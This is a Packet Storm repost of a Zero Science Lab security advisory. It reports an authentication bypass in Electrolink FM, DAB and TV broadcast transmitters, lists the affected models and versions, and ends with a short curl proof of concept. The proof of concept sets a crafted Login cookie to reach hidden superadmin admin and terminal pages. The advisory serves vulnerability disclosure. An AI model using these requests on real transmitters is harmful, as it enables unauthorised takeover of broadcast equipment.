exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Electrolink FM/DAB/TV Transmitter SuperAdmin Hidden Functionality

Electrolink FM/DAB/TV Transmitter SuperAdmin Hidden Functionality
Posted Oct 2, 2023
Authored by LiquidWorm | Site zeroscience.mk

Electrolink FM/DAB/TV Transmitter allows an unauthenticated attacker to bypass authentication and modify the Cookie to reveal hidden pages that allows more critical operations to the transmitter.

tags | exploit
SHA-256 | 45f211ad4dbcb54d00567ce51f651830505f6738b0f64c25cbfb2bd139946f03

Electrolink FM/DAB/TV Transmitter SuperAdmin Hidden Functionality

Change Mirror Download

Electrolink FM/DAB/TV Transmitter SuperAdmin Hidden Functionality


Vendor: Electrolink s.r.l.
Product web page: https://www.electrolink.com
Affected version: 10W, 100W, 250W, Compact DAB Transmitter
500W, 1kW, 2kW Medium DAB Transmitter
2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
100W, 500W, 1kW, 2kW Compact FM Transmitter
3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
15W - 40kW Digital FM Transmitter
BI, BIII VHF TV Transmitter
10W - 5kW UHF TV Transmitter
Web version: 01.09, 01.08, 01.07
Display version: 1.4, 1.2
Control unit version: 01.06, 01.04, 01.03
Firmware version: 2.1

Summary: Since 1990 Electrolink has been dealing with design and
manufacturing of advanced technologies for radio and television
broadcasting. The most comprehensive products range includes: FM
Transmitters, DAB Transmitters, TV Transmitters for analogue and
digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
switches, Manual patch panels, RF power meters, Rigid line and
accessories. A professional solution that meets broadcasters needs
from small community television or radio to big government networks.

Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
touch-screen display and in-built state of the art DAB modulator,
EDI input and GPS receiver. All transmitters are equipped with a
state-of-the art DAB modulator with excellent performances,
self-protected and self-controlled amplifiers ensure trouble-free
non-stop operation.

100W, 500W, 1kW and 2kW power range available on compact 2U and
3U 19" frame. Built-in stereo coder, touch screen display and
efficient low noise air cooling system. Available models: 3kW,
5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
with fully broadband solid state amplifiers and an efficient
low-noise air cooling system.

FM digital modulator with excellent specifications, built-in
stereo and RDS coder. Digital deviation limiter together with
ASI and SDI inputs are available. These transmitters are ready
for ISOFREQUENCY networks.

Available for VHF BI and VHF BIII operation with robust desing
and user-friendly local and remote control. Multi-standard UHF
TV transmitters from 10W up to 5kW with efficient low noise air
cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
and ISDB-Tb available.

Desc: The device allows an unauthenticated attacker to bypass
authentication and modify the Cookie to reveal hidden pages
that allows more critical operations to the transmitter.

Tested on: Mbedthis-Appweb/12.5.0
Mbedthis-Appweb/12.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research & Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2023-5794
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5794.php


30.06.2023

--


C:\>curl -s "http://192.168.150.77:8888/home.htm" | findstr /spina:d "admin"
33:<a class="linkm admin" href="/setting.htm">Setting & Status</a>
34:<a class="linkm admin" href="/lan.htm">Setting lan</a>
35:<a class="linkm admin" href="/snmp.htm">Setting snmp</a>
36:<a class="linkm admin" href="/mail.htm">Setting e-mail</a>
37:<a class="linkm admin" href="/login.htm">Setting login</a>
38:<a class="linkm admin superadmin" href="/admin.htm">Setting admin</a>
39:<a class="linkm admin superadmin" href="/terminal.htm">Terminal</a>
...
C:\>curl -s "http://192.168.150.77:8888/admin.htm" -H "Cookie: Login=ZSL"
C:\>curl -s "http://192.168.150.77:8888/terminal.htm" -H "Cookie: Login=ZSL"
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close